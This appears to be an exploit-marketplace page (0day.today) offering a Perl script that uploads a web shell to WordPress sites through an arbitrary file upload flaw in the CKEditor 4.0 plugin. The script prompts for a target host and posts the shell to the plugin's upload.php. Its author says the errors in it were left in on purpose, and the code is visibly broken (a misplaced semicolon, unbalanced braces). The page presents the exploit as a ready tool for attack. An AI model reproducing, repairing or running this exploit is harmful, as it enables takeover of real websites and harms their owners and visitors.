[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress plugin CKEditor 4.0 Arbitrary File Upload Exploit

Author
sk0d
Risk
[
Security Risk High
]
0day-ID
0day-ID-20318
Category
web applications
Date add
07-02-2013
Platform
php
# Exploit-Title: Wordpress plugin CKEditor 4.0 Arbitrary File Upload Exploit
# Date: 2013-02-07
# Author: sk0d
# Software-Link: http://downloads.wordpress.org/plugin/ckeditor-for-wordpress.4.0.zip
# Version: 4.0
# Category: web-applications
# GoogleDork: n/a ----> NO! with little errors in sploitcode gainst kiddies :P
# Tested on: Ubuntu-Linux

# Use the following perlcode to upload a shell to compromise the system.
# A real hacker can correct the little errors ;-)




#!/usr/bin/perl

use strict;
use LWP::UserAgent;
use HTTP::Request::Common;

print <<INTRO;
- Wordpress plugin CKEditor 4.0 Arbitrary File Upload Exploit
- Vuln found and exploit written by sk0d SOH-Crew
- Contact: [email protected]
- Greetings: bd0rk, RaSsGoR, x0r_32
INTRO
print "Targethost: ";
chomp (my $tar=<STDIN>);
print "Directory: ";
chomp (my $shell=<STDIN>);

my $a = LWP::UserAgent->new;
my $b = $a->request(POST $tar.'/wp-content/plugins/ckeditor-for-wordpress/includes/upload.php';
Content_Type => 'form-data',
Content => [ NewFile => $shell ] );

if ($b->is_success) {
if (index($b->content, "Disabled") != -1) { print "The webserver is manipulated with your shellcode.\n"; } else { print "Exploit failed! :(\n";
} else { print "Not connected with Target!\n"; }

exit;

#  0day.today [2024-03-29]  #